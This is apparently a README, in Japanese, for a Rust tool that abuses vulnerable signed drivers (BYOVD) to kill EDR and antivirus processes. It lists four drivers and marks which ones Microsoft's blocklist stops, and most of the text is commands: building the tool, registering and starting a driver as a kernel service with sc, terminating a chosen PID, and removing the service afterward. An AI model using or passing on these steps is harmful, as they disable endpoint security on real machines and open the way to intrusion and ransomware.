
BYOVD collection
このプロジェクトは、EDR / AV プロセスの停止に焦点を当てた BYOVD コレクションです。
現在、以下のドライバがサポートされています:
| ドライバ | 引数名 | ブロック済み |
|---|---|---|
| Process Explorer | process_explorer | はい |
| Genshin Impact | genshin | はい |
| Rentdrv2 | rentdrv2 | いいえ |
| TrueSight | truesight | いいえ |
ブロック済みとは、そのドライバが Microsoft の ブロックリスト に含まれており、最新の Windows では実行できないことを意味します。
cargo build --release
rusty_drivers.exe --help
Usage: rusty_drivers.exe --pid <PID> --driver <DRIVER>
Options:
-p, --pid <PID>
-d, --driver <DRIVER>
-h, --help Print help
-V, --version Print version
実行ファイルはドライバを悪用するためのサービスを登録しないため、これを手動で行う必要があります:
sc create Test123 binpath= c:\test\<DRIVER>.sys type= kernel start= auto
その後、サービスを開始できます:
sc start Test123
最後に、Process Explorer ドライバを使用して PID 1234 のプロセスを終了するには、次のコマンドを使用できます:
rusty_drivers.exe --pid 1234 --driver process_explorer
その後、サービスをクリーンアップすることを忘れないでください:
sc stop Test123
sc delete Test123